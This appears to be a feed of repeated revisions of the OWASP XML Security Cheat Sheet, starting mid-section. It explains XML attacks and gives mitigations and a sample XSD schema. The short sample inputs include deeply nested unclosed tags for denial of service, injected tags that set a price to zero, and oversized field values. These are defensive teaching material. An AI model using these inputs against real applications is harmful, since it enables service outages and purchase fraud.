  &amp;lt;A2&amp;gt; &lt;br /&gt;
   &amp;lt;A3&amp;gt;&lt;br /&gt;
     ...&lt;br /&gt;
      &amp;lt;A30000&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
;Recommendation&lt;br /&gt;
To avoid this attack you must define a maximum number of items (elements, attributes, entities, etc.) to be processed by the parser. If possible, use an XML schema to validate the document structure.&lt;br /&gt;
&lt;br /&gt;
== Violation of XML Specification Rules ==&lt;br /&gt;
Unexpected consequences may result from manipulating documents using parsers that do not follow W3C specifications. It may be possible to achieve crashes and/or code execution when the software does not properly verify how to handle incorrect XML structures. Feeding the software with fuzzed XML documents may expose this behavior. &lt;br /&gt;
&lt;br /&gt;
;Recommendation&lt;br /&gt;
To avoid this attack you must use an XML processor that follows W3C specifications. In addition, validate the contents of each element and attribute to process only valid values within predefined boundaries.&lt;br /&gt;
&lt;br /&gt;
= Invalid XML Documents =&lt;br /&gt;
Attackers may introduce unexpected values in documents to take advantage of an application that does not verify whether the document contains a valid set of values. Schemas specify restrictions that help identify whether documents are valid. A valid document is well formed and complies with the restrictions of a schema, and more than one schema can be used to validate a document. These restrictions may appear in multiple files, either using a single schema language or relying on the strengths of the different schema languages.&lt;br /&gt;
&lt;br /&gt;
== Document without Schema ==&lt;br /&gt;
Consider a bookseller that uses a web service through a web interface to make transactions. The XML document for transactions is composed of two elements: an id value related to an item and a certain price. The user may only introduce a certain id value using the web interface:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;123&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
&amp;lt;/buy&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
If there is no control on the document’s structure, the application could also process different well-formed messages with unintended consequences. The previous document could have contained additional tags to affect the behavior of the underlying application processing its contents:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;123&amp;lt;/id&amp;gt;&amp;lt;price&amp;gt;0&amp;lt;/price&amp;gt;&amp;lt;id&amp;gt;&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
&amp;lt;/buy&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Notice again how the value 123 is supplied as an id, but now the document includes additional opening and closing tags. The attacker closes the id element and sets a bogus price element to the value 0. The final step to keep the structure well-formed is to add one opening id. After this, the application adds the closing tag for id and sets the price to 10. If the application processes only the first values provided for the id and the price without performing any type of control on the structure, the attacker could buy a book without actually paying for it.&lt;br /&gt;
&lt;br /&gt;
; Recommendation&lt;br /&gt;
Each XML document must have a precisely defined XML schema with every piece of information properly restricted to avoid problems of improper data validation. &lt;br /&gt;
&lt;br /&gt;
== Unrestrictive Schema ==&lt;br /&gt;
Certain schemas don’t offer enough restrictions for the type of data that each element can receive. This is what normally happens when using DTD; it has a very limited set of possibilities compared to the type of restrictions that can be applied in XML documents. This could expose the application to undesired values within elements or attributes that would be easy to constrain when using other schema languages. In the following example, a person’s age is validated against an inline DTD schema:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE person [&lt;br /&gt;
  &amp;lt;!ELEMENT person (name, age)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT name (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT age (#PCDATA)&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;person&amp;gt;&lt;br /&gt;
  &amp;lt;name&amp;gt;John Doe&amp;lt;/name&amp;gt;&lt;br /&gt;
  &amp;lt;age&amp;gt;11111..(1.000.000digits)..11111&amp;lt;/age&amp;gt;&lt;br /&gt;
&amp;lt;/person&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous document contains an inline DTD with a root element named person. This element contains two elements in a specific order: name and then age. Both name and age are then defined to contain PCDATA. The well-formed and valid XML document begins after these definitions. The element name contains an irrelevant value, but the age element contains one million digits. Since the DTD places no restriction on the maximum size of the age element, this one-million-digit string is valid and could be sent to the server. Typically this type of element should be restricted to a maximum number of characters and constrained to a certain set of characters (for example, digits from 0 to 9, the + sign and the - sign).&lt;br /&gt;
If not properly restricted, applications may handle potentially invalid values contained in documents. Since it isn’t possible to indicate specific restrictions (a maximum length for the element name or a valid range for the element age), this type of schema increases the risk of affecting the integrity and availability of resources.&lt;br /&gt;
&lt;br /&gt;
;Recommendation&lt;br /&gt;
Use a schema language capable of properly restricting information.&lt;br /&gt;
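&lt;br /&gt;
As a minimal sketch of this recommendation, the following W3C XML Schema (XSD) describes the same person document while constraining both elements. The maximum name length of 100 characters and the age range of 0 to 150 are illustrative assumptions, not values taken from this cheat sheet:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;person&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
      &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
        &amp;lt;!-- name: a string capped at an assumed maximum length --&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;name&amp;quot;&amp;gt;&lt;br /&gt;
          &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
            &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
              &amp;lt;xs:maxLength value=&amp;quot;100&amp;quot;/&amp;gt;&lt;br /&gt;
            &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
          &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
        &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
        &amp;lt;!-- age: an integer limited to an assumed valid range --&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;age&amp;quot;&amp;gt;&lt;br /&gt;
          &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
            &amp;lt;xs:restriction base=&amp;quot;xs:integer&amp;quot;&amp;gt;&lt;br /&gt;
              &amp;lt;xs:minInclusive value=&amp;quot;0&amp;quot;/&amp;gt;&lt;br /&gt;
              &amp;lt;xs:maxInclusive value=&amp;quot;150&amp;quot;/&amp;gt;&lt;br /&gt;
            &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
          &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
        &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
      &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&amp;lt;/xs:schema&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Validated against a schema like this one, the one-million-digit age value would be rejected because it exceeds the maxInclusive bound. Validation only constrains the accepted values; limits on overall document size still need to be enforced separately.&lt;br /&gt;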
&lt;br /&gt;
=Authors and Primary Editors=&lt;br /&gt;
&lt;br /&gt;
[mailto:fernando.arnaboldi@ioactive.com Fernando Arnaboldi]&lt;/div&gt;</summary>
		<author><name>Fernando.arnaboldi</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=XML_Security_Cheat_Sheet&amp;diff=224231</id>
		<title>XML Security Cheat Sheet</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=XML_Security_Cheat_Sheet&amp;diff=224231"/>
				<updated>2016-12-19T20:50:00Z</updated>
		
		<summary type="html">&lt;p&gt;Fernando.arnaboldi: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Introduction ==&lt;br /&gt;
&lt;br /&gt;
Specifications for XML and XML schemas include multiple security flaws. At the same time, these specifications provide the tools required to protect XML applications. This provides a complex scenario for developers, and a fun environment for hackers. Even though we use XML schemas to define the security of XML documents, they can be used to perform a variety of attacks: file retrieval, server side request forgery, port scanning, or brute forcing. This cheat sheet analyzes how to infer new attack vectors from current vulnerabilities and how they can affect common libraries and software. It also provides recommendations for safe deployment of applications relying on XML.&lt;br /&gt;
&lt;br /&gt;
=  Malformed XML Documents =&lt;br /&gt;
&lt;br /&gt;
The W3C XML specification defines a set of principles that XML documents must follow to be considered well formed. When a document violates any of these principles, the violation must be treated as a fatal error and the data the document contains is considered malformed. Multiple tactics will cause a malformed document: removing an ending tag, rearranging the order of elements into a nonsensical structure, introducing forbidden characters, and so on. The XML parser should stop execution upon detecting a fatal error. The document shouldn’t undergo any additional processing, and the application should display an error message.&lt;br /&gt;
&lt;br /&gt;
== More Time Required ==&lt;br /&gt;
&lt;br /&gt;
A malformed document may affect the consumption of Central Processing Unit (CPU) resources. In certain scenarios, the amount of time required to process malformed documents may be greater than that required for well-formed documents. When this happens, an attacker may exploit an asymmetric resource consumption attack to take advantage of the greater processing time to cause a Denial of Service (DoS). &lt;br /&gt;
&lt;br /&gt;
To assess the likelihood of this attack, compare the time taken to process a well-formed XML document with the time taken to process a malformed one. Then, consider how an attacker could use this vulnerability in conjunction with an XML flood attack using multiple documents.&lt;br /&gt;
&lt;br /&gt;
;Recommendation&lt;br /&gt;
&lt;br /&gt;
To avoid this attack, you must confirm that your version of the XML processor does not take additional time to process malformed documents.&lt;br /&gt;
&lt;br /&gt;
== Applications Processing Malformed Data ==&lt;br /&gt;
Certain XML parsers have the ability to recover malformed documents. They can be instructed to try their best to return a valid tree with all the content that they can manage to parse, regardless of the document’s noncompliance with the specifications. Since there are no predefined rules for the recovery process, the approach and results may not always be the same. Using malformed documents might lead to unexpected issues related to data integrity.&lt;br /&gt;
&lt;br /&gt;
The following two scenarios illustrate attack vectors a parser will analyze in recovery mode:&lt;br /&gt;
&lt;br /&gt;
=== Malformed Document to Malformed Document ===&lt;br /&gt;
According to the XML specification, the string -- (double-hyphen) must not occur within comments. Using the recovery mode of lxml and PHP, the following document will remain the same after being recovered:&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;element&amp;gt;&lt;br /&gt;
  &amp;lt;!-- one&lt;br /&gt;
    &amp;lt;!-- another comment&lt;br /&gt;
  comment --&amp;gt;&lt;br /&gt;
&amp;lt;/element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Well-Formed Document to Well-Formed Document Normalized ===&lt;br /&gt;
Certain parsers may normalize the contents of your CDATA sections. This means that they will replace the special characters contained in the CDATA section with the safe versions of these characters even though it is not required:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;element&amp;gt;&lt;br /&gt;
  &amp;lt;![CDATA[&amp;lt;script&amp;gt;a=1;&amp;lt;/script&amp;gt;]]&amp;gt;&lt;br /&gt;
&amp;lt;/element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Normalization of a CDATA section is not a common rule among parsers. Libxml could transform this document to its canonical version, but although well formed, its contents may be considered malformed depending on the situation:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;element&amp;gt;&lt;br /&gt;
  &amp;amp;amp;lt;script&amp;amp;amp;gt;a=1;&amp;amp;amp;lt;/script&amp;amp;amp;gt; &lt;br /&gt;
&amp;lt;/element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
;Recommendation&lt;br /&gt;
If it is not possible to process only well-formed documents, take into consideration that the final results could be unreliable. To avoid this attack completely, you must not recover or process malformed documents.&lt;br /&gt;
&lt;br /&gt;
== Coercive Parsing ==&lt;br /&gt;
A coercive attack in XML involves parsing deeply nested XML documents without their corresponding ending tags. The idea is to make the victim use up—and eventually deplete—the machine’s resources and cause a denial of service on the target.&lt;br /&gt;
Reports of a DoS attack in Firefox 3.6 included the use of 30,000 open XML elements without their corresponding ending tags. Removing the closing tags simplifies the attack since it requires only half the size of a well-formed document to accomplish the same results. The number of tags being processed eventually caused a stack overflow. A simplified version of such a document would look like this:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;A1&amp;gt;&lt;br /&gt;
  &amp;lt;A2&amp;gt; &lt;br /&gt;
   &amp;lt;A3&amp;gt;&lt;br /&gt;
     ...&lt;br /&gt;
      &amp;lt;A30000&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
;Recommendation&lt;br /&gt;
To avoid this attack you must define a maximum number of items (elements, attributes, entities, etc.) to be processed by the parser. If possible, use an XML schema to validate the document structure.&lt;br /&gt;
&lt;br /&gt;
== Violation of XML Specification Rules ==&lt;br /&gt;
Unexpected consequences may result from manipulating documents using parsers that do not follow W3C specifications. It may be possible to achieve crashes and/or code execution when the software does not properly verify how to handle incorrect XML structures. Feeding the software with fuzzed XML documents may expose this behavior. &lt;br /&gt;
&lt;br /&gt;
;Recommendation&lt;br /&gt;
To avoid this attack you must use an XML processor that follows W3C specifications. In addition, validate the contents of each element and attribute to process only valid values within predefined boundaries.&lt;br /&gt;
&lt;br /&gt;
=Authors and Primary Editors=&lt;br /&gt;
&lt;br /&gt;
[mailto:fernando.arnaboldi@ioactive.com Fernando Arnaboldi]&lt;/div&gt;</summary>
		<author><name>Fernando.arnaboldi</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=XML_Security_Cheat_Sheet&amp;diff=224178</id>
		<title>XML Security Cheat Sheet</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=XML_Security_Cheat_Sheet&amp;diff=224178"/>
				<updated>2016-12-15T10:45:46Z</updated>
		
		<summary type="html">&lt;p&gt;Fernando.arnaboldi: /* Malformed Document to Malformed Document Containing Unexpected Characters */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Introduction ==&lt;br /&gt;
&lt;br /&gt;
Specifications for XML and XML schemas include multiple security flaws. At the same time, these specifications provide the tools required to protect XML applications. This provides a complex scenario for developers, and a fun environment for hackers. Even though we use XML schemas to define the security of XML documents, they can be used to perform a variety of attacks: file retrieval, server side request forgery, port scanning, or brute forcing. This cheat sheet analyzes how to infer new attack vectors from current vulnerabilities and how they can affect common libraries and software. It also provides recommendations for safe deployment of applications relying on XML.&lt;br /&gt;
&lt;br /&gt;
=  Malformed XML Documents =&lt;br /&gt;
&lt;br /&gt;
The W3C XML specification defines a set of principles that XML documents must follow to be considered well formed. When a document violates any of these principles, the violation must be treated as a fatal error and the data the document contains is considered malformed. Multiple tactics will cause a malformed document: removing an ending tag, rearranging the order of elements into a nonsensical structure, introducing forbidden characters, and so on. The XML parser should stop execution upon detecting a fatal error. The document shouldn’t undergo any additional processing, and the application should display an error message.&lt;br /&gt;
&lt;br /&gt;
== More Time Required ==&lt;br /&gt;
&lt;br /&gt;
A malformed document may affect the consumption of Central Processing Unit (CPU) resources. In certain scenarios, the amount of time required to process malformed documents may be greater than that required for well-formed documents. When this happens, an attacker may exploit an asymmetric resource consumption attack to take advantage of the greater processing time to cause a Denial of Service (DoS). &lt;br /&gt;
&lt;br /&gt;
Apache Xerces-J XML may serve as an example for this type of vulnerability; in this case, malformed data caused the XML parser &amp;quot;&amp;lt;i&amp;gt;...to consume CPU resource for several minutes before the data [was] eventually rejected. This behavior can be used to launch a denial of service attack against any Java server application, which processes XML data supplied by remote users.&amp;lt;/i&amp;gt;&amp;quot;. An attacker could use this vulnerability in conjunction with an XML flood attack using multiple documents.&lt;br /&gt;
&lt;br /&gt;
;Recommendation&lt;br /&gt;
&lt;br /&gt;
To avoid this attack, you must confirm that your version of the XML processor does not take additional time to process malformed documents.&lt;br /&gt;
&lt;br /&gt;
== Applications Processing Malformed Data ==&lt;br /&gt;
Certain XML parsers have the ability to recover malformed documents. They can be instructed to try their best to return a valid tree with all the content that they can manage to parse, regardless of the document’s noncompliance with the specifications. Since there are no predefined rules for the recovery process, the approach and results may not always be the same. Using malformed documents might lead to unexpected issues related to data integrity.&lt;br /&gt;
&lt;br /&gt;
The following two scenarios illustrate attack vectors a parser will analyze in recovery mode:&lt;br /&gt;
&lt;br /&gt;
=== Malformed Document to Malformed Document ===&lt;br /&gt;
According to the XML specification, the string -- (double-hyphen) must not occur within comments. Using the recovery mode of lxml and PHP, the following document will remain the same after being recovered:&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;element&amp;gt;&lt;br /&gt;
  &amp;lt;!-- one&lt;br /&gt;
    &amp;lt;!-- another comment&lt;br /&gt;
  comment --&amp;gt;&lt;br /&gt;
&amp;lt;/element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Well-Formed Document to Well-Formed Document Normalized ===&lt;br /&gt;
Certain parsers may normalize the contents of your CDATA sections. This means that they will replace the special characters contained in the CDATA section with the safe versions of these characters even though it is not required:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;element&amp;gt;&lt;br /&gt;
  &amp;lt;![CDATA[&amp;lt;script&amp;gt;a=1;&amp;lt;/script&amp;gt;]]&amp;gt;&lt;br /&gt;
&amp;lt;/element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Normalization of a CDATA section is not a common rule among parsers. Libxml could transform this document to its canonical version, but although well formed, its contents may be considered malformed depending on the situation:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;element&amp;gt;&lt;br /&gt;
  &amp;amp;amp;lt;script&amp;amp;amp;gt;a=1;&amp;amp;amp;lt;/script&amp;amp;amp;gt; &lt;br /&gt;
&amp;lt;/element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=Authors and Primary Editors=&lt;br /&gt;
&lt;br /&gt;
[mailto:fernando.arnaboldi@ioactive.com Fernando Arnaboldi]&lt;/div&gt;</summary>
		<author><name>Fernando.arnaboldi</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=XML_Security_Cheat_Sheet&amp;diff=224165</id>
		<title>XML Security Cheat Sheet</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=XML_Security_Cheat_Sheet&amp;diff=224165"/>
				<updated>2016-12-15T00:04:48Z</updated>
		
		<summary type="html">&lt;p&gt;Fernando.arnaboldi: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Introduction ==&lt;br /&gt;
&lt;br /&gt;
Specifications for XML and XML schemas include multiple security flaws. At the same time, these specifications provide the tools required to protect XML applications. This provides a complex scenario for developers, and a fun environment for hackers. Even though we use XML schemas to define the security of XML documents, they can be used to perform a variety of attacks: file retrieval, server side request forgery, port scanning, or brute forcing. This cheat sheet analyzes how to infer new attack vectors from current vulnerabilities and how they can affect common libraries and software. It also provides recommendations for safe deployment of applications relying on XML.&lt;br /&gt;
&lt;br /&gt;
=  Malformed XML Documents =&lt;br /&gt;
&lt;br /&gt;
The W3C XML specification defines a set of principles that XML documents must follow to be considered well formed. When a document violates any of these principles, the violation must be treated as a fatal error and the data the document contains is considered malformed. Multiple tactics will cause a malformed document: removing an ending tag, rearranging the order of elements into a nonsensical structure, introducing forbidden characters, and so on. The XML parser should stop execution upon detecting a fatal error. The document shouldn’t undergo any additional processing, and the application should display an error message.&lt;br /&gt;
&lt;br /&gt;
== More Time Required ==&lt;br /&gt;
&lt;br /&gt;
A malformed document may affect the consumption of Central Processing Unit (CPU) resources. In certain scenarios, the amount of time required to process malformed documents may be greater than that required for well-formed documents. When this happens, an attacker may exploit an asymmetric resource consumption attack to take advantage of the greater processing time to cause a Denial of Service (DoS). &lt;br /&gt;
&lt;br /&gt;
Apache Xerces-J XML may serve as an example for this type of vulnerability; in this case, malformed data caused the XML parser &amp;quot;&amp;lt;i&amp;gt;...to consume CPU resource for several minutes before the data [was] eventually rejected. This behavior can be used to launch a denial of service attack against any Java server application, which processes XML data supplied by remote users.&amp;lt;/i&amp;gt;&amp;quot;. An attacker could use this vulnerability in conjunction with an XML flood attack using multiple documents.&lt;br /&gt;
&lt;br /&gt;
;Recommendation&lt;br /&gt;
&lt;br /&gt;
To avoid this attack, you must confirm that your version of the XML processor does not take additional time to process malformed documents.&lt;br /&gt;
&lt;br /&gt;
== Applications Processing Malformed Data ==&lt;br /&gt;
Certain XML parsers have the ability to recover malformed documents. They can be instructed to try their best to return a valid tree with all the content that they can manage to parse, regardless of the document’s noncompliance with the specifications. Since there are no predefined rules for the recovery process, the approach and results may not always be the same. Using malformed documents might lead to unexpected issues related to data integrity.&lt;br /&gt;
&lt;br /&gt;
The following two scenarios illustrate attack vectors a parser will analyze in recovery mode:&lt;br /&gt;
&lt;br /&gt;
=== Malformed Document to Malformed Document Containing Unexpected Characters ===&lt;br /&gt;
According to the XML specification, the string -- (double-hyphen) must not occur within comments. Using the recovery mode of lxml and PHP, the following document will remain the same after being recovered:&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;element&amp;gt;&lt;br /&gt;
  &amp;lt;!-- one&lt;br /&gt;
    &amp;lt;!-- another comment&lt;br /&gt;
  comment --&amp;gt;&lt;br /&gt;
&amp;lt;/element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Well-Formed Document to Well-Formed Document Normalized ===&lt;br /&gt;
Certain parsers may normalize the contents of your CDATA sections. This means that they will replace the special characters contained in the CDATA section with the safe versions of these characters even though it is not required:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;element&amp;gt;&lt;br /&gt;
  &amp;lt;![CDATA[&amp;lt;script&amp;gt;a=1;&amp;lt;/script&amp;gt;]]&amp;gt;&lt;br /&gt;
&amp;lt;/element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Normalization of a CDATA section is not a common rule among parsers. Libxml could transform this document to its canonical version, but although well formed, its contents may be considered malformed depending on the situation:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;element&amp;gt;&lt;br /&gt;
  &amp;amp;amp;lt;script&amp;amp;amp;gt;a=1;&amp;amp;amp;lt;/script&amp;amp;amp;gt; &lt;br /&gt;
&amp;lt;/element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=Authors and Primary Editors=&lt;br /&gt;
&lt;br /&gt;
[mailto:fernando.arnaboldi@ioactive.com Fernando Arnaboldi]&lt;/div&gt;</summary>
		<author><name>Fernando.arnaboldi</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=XML_Security_Cheat_Sheet&amp;diff=224159</id>
		<title>XML Security Cheat Sheet</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=XML_Security_Cheat_Sheet&amp;diff=224159"/>
				<updated>2016-12-14T19:34:10Z</updated>
		
		<summary type="html">&lt;p&gt;Fernando.arnaboldi: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Introduction ==&lt;br /&gt;
&lt;br /&gt;
Specifications for XML and XML schemas include multiple security flaws. At the same time, these specifications provide the tools required to protect XML applications. This provides a complex scenario for developers, and a fun environment for hackers. Even though we use XML schemas to define the security of XML documents, they can be used to perform a variety of attacks: file retrieval, server side request forgery, port scanning, or brute forcing. This cheat sheet analyzes how to infer new attack vectors from current vulnerabilities and how they can affect common libraries and software. It also provides recommendations for safe deployment of applications relying on XML.&lt;br /&gt;
&lt;br /&gt;
=  Malformed XML Documents =&lt;br /&gt;
&lt;br /&gt;
The W3C XML specification defines a set of principles that XML documents must follow to be considered well formed. When a document violates any of these principles, the violation must be treated as a fatal error and the data the document contains is considered malformed. Multiple tactics will cause a malformed document: removing an ending tag, rearranging the order of elements into a nonsensical structure, introducing forbidden characters, and so on. The XML parser should stop execution upon detecting a fatal error. The document shouldn’t undergo any additional processing, and the application should display an error message.&lt;br /&gt;
&lt;br /&gt;
== More Time Required ==&lt;br /&gt;
&lt;br /&gt;
A malformed document may affect the consumption of Central Processing Unit (CPU) resources. In certain scenarios, the amount of time required to process malformed documents may be greater than that required for well-formed documents. When this happens, an attacker may exploit an asymmetric resource consumption attack to take advantage of the greater processing time to cause a Denial of Service (DoS). &lt;br /&gt;
&lt;br /&gt;
Apache Xerces-J XML may serve as an example for this type of vulnerability; in this case, malformed data caused the XML parser &amp;quot;&amp;lt;i&amp;gt;...to consume CPU resource for several minutes before the data [was] eventually rejected. This behavior can be used to launch a denial of service attack against any Java server application, which processes XML data supplied by remote users.&amp;lt;/i&amp;gt;&amp;quot;. An attacker could use this vulnerability in conjunction with an XML flood attack using multiple documents.&lt;br /&gt;
&lt;br /&gt;
;Recommendation&lt;br /&gt;
&lt;br /&gt;
To avoid this attack, you must confirm that your version of the XML processor does not take additional time to process malformed documents.&lt;br /&gt;
&lt;br /&gt;
== Applications Processing Malformed Data ==&lt;br /&gt;
Certain XML parsers have the ability to recover malformed documents. They can be instructed to try their best to return a valid tree with all the content that they can manage to parse, regardless of the document’s noncompliance with the specifications. Since there are no predefined rules for the recovery process, the approach and results may not always be the same. Using malformed documents might lead to unexpected issues related to data integrity.&lt;br /&gt;
&lt;br /&gt;
The following three scenarios illustrate attack vectors a parser will analyze in recovery mode:&lt;br /&gt;
&lt;br /&gt;
=== Malformed Document to Malformed Document Containing Unexpected Characters ===&lt;br /&gt;
According to the XML specification, the string -- (double-hyphen) must not occur within comments. Using the recovery mode of lxml and PHP, the following document will remain the same after being recovered:&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;element&amp;gt;&lt;br /&gt;
  &amp;lt;!-- one&lt;br /&gt;
    &amp;lt;!-- another comment&lt;br /&gt;
  comment --&amp;gt;&lt;br /&gt;
&amp;lt;/element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Well-Formed Document to Well-Formed Document using Normalization ===&lt;br /&gt;
Certain parsers may normalize the contents of your CDATA sections. This means that they will replace the special characters contained in the CDATA section with the safe versions of these characters even though it is not required:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;element&amp;gt;&lt;br /&gt;
  &amp;lt;![CDATA[&amp;lt;script&amp;gt;a=1;&amp;lt;/script&amp;gt;]]&amp;gt;&lt;br /&gt;
&amp;lt;/element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Normalization of a CDATA section is not a common rule among parsers. Libxml could transform this document to its canonical version, but although well formed, its contents may be considered malformed depending on the situation:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;element&amp;gt;&lt;br /&gt;
  &amp;amp;amp;lt;script&amp;amp;amp;gt;a=1;&amp;amp;amp;lt;/script&amp;amp;amp;gt; &lt;br /&gt;
&amp;lt;/element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Malformed Document to Well-Formed Document Including Content Modification ===&lt;br /&gt;
The contents of certain malformed documents could be altered after being recovered. Consider the scenario where a book is on sale unless the value of its &amp;quot;onsale&amp;quot; element is no:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;book&amp;gt;&lt;br /&gt;
  &amp;lt;item&amp;gt;ABC101&amp;lt;/item&amp;gt;&lt;br /&gt;
  &amp;lt;value&amp;gt;10&amp;lt;/value&amp;gt;&lt;br /&gt;
  &amp;lt;onsale&amp;amp;&amp;gt;no&amp;lt;/onsale&amp;gt;&lt;br /&gt;
  &amp;lt;onsalevalue&amp;gt;5&amp;lt;/onsalevalue&amp;gt;&lt;br /&gt;
&amp;lt;/book&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous onsale element contains the &amp;amp; character, which is not supposed to be there. The resulting value of that element may be different after document recovery:&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;book&amp;gt;&lt;br /&gt;
  &amp;lt;item&amp;gt;ABC101&amp;lt;/item&amp;gt;&lt;br /&gt;
  &amp;lt;value&amp;gt;10&amp;lt;/value&amp;gt;&lt;br /&gt;
  &amp;lt;onsale/&amp;gt;&lt;br /&gt;
  &amp;amp;amp;gt;no&lt;br /&gt;
  &amp;lt;onsalevalue&amp;gt;5&amp;lt;/onsalevalue&amp;gt;&lt;br /&gt;
&amp;lt;/book&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Authors and Primary Editors=&lt;br /&gt;
&lt;br /&gt;
[mailto:fernando.arnaboldi@ioactive.com Fernando Arnaboldi]&lt;/div&gt;</summary>
		<author><name>Fernando.arnaboldi</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=XML_Security_Cheat_Sheet&amp;diff=224123</id>
		<title>XML Security Cheat Sheet</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=XML_Security_Cheat_Sheet&amp;diff=224123"/>
				<updated>2016-12-13T22:49:45Z</updated>
		
		<summary type="html">&lt;p&gt;Fernando.arnaboldi: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Introduction ==&lt;br /&gt;
&lt;br /&gt;
Specifications for XML and XML schemas include multiple security flaws. At the same time, these specifications provide the tools required to protect XML applications. This provides a complex scenario for developers, and a fun environment for hackers. Even though we use XML schemas to define the security of XML documents, they can be used to perform a variety of attacks: file retrieval, server side request forgery, port scanning, or brute forcing. This cheat sheet analyzes how to infer new attack vectors from current vulnerabilities and how they can affect common libraries and software. It also provides recommendations for safe deployment of applications relying on XML.&lt;br /&gt;
